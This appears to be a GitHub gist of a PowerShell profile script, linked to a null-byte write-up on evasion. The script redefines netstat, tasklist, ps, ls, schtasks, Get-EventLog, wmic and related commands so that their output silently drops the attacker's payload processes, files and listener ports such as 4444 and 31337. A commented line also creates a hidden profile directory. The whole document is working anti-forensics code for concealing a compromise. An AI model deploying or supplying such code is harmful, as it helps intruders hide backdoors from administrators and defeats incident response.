PowerShell profile.ps1 for evading Netstat, Tasklist, Get-EventLog, Schtasks, etc
# write-up: https://null-byte.com/powershell-evasion-0329395/ | |
# create the profile.ps1 directory if it doesn't exist | |
# cd $env:USERPROFILE;$d="Documents\WindowsPowerShell\";New-Item -ItemType Directory -Name "$d";$h=Get-Item "$d";$h.Attributes="Hidden" | |
# processes and filenames to exclude, pipe separated. e.g., payload.exe, evil.dll, tokyoneon.ps1 | |
$excludeFiles = "payload|evil|tokyoneon" | |
# listening ports and PIDs to exclude | |
$excludePorts = "4444|1337|31337|55555" | |
function netstat { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
function netstat.exe { powershell.exe -NoProfile -c "netstat.exe $args" | Select-String -notmatch "$excludePorts" } | |
function Get-Process { powershell.exe -NoProfile -c "Get-Process $args" | Select-String -notmatch "$excludeFiles" } | |
function ps { powershell.exe -NoProfile -c "ps $args" | Select-String -notmatch "$excludeFiles" } | |
function tasklist { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
function tasklist.exe { powershell.exe -NoProfile -c "tasklist.exe $args" | Select-String -notmatch "$excludeFiles" } | |
function ls { powershell.exe -NoProfile -c "ls $args" | Select-String -notmatch "$excludeFiles" } | |
function Get-ChildItem { powershell.exe -NoProfile -c "Get-ChildItem $args" | Select-String -notmatch "$excludeFiles" } | |
function schtasks { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
function schtasks.exe { powershell.exe -NoProfile -c "schtasks.exe $args" | Select-String -notmatch "$excludeFiles" } | |
function Get-EventLog { powershell.exe -NoProfile -c "Get-EventLog $args" | Select-String -notmatch "$excludeFiles|$excludePorts" } | |
function wmic { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } | |
function wmic.exe { powershell.exe -NoProfile -c "wmic.exe $args" | Select-String -notmatch "$excludeFiles|$excludePorts" | ?{$_ -ne ""} } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment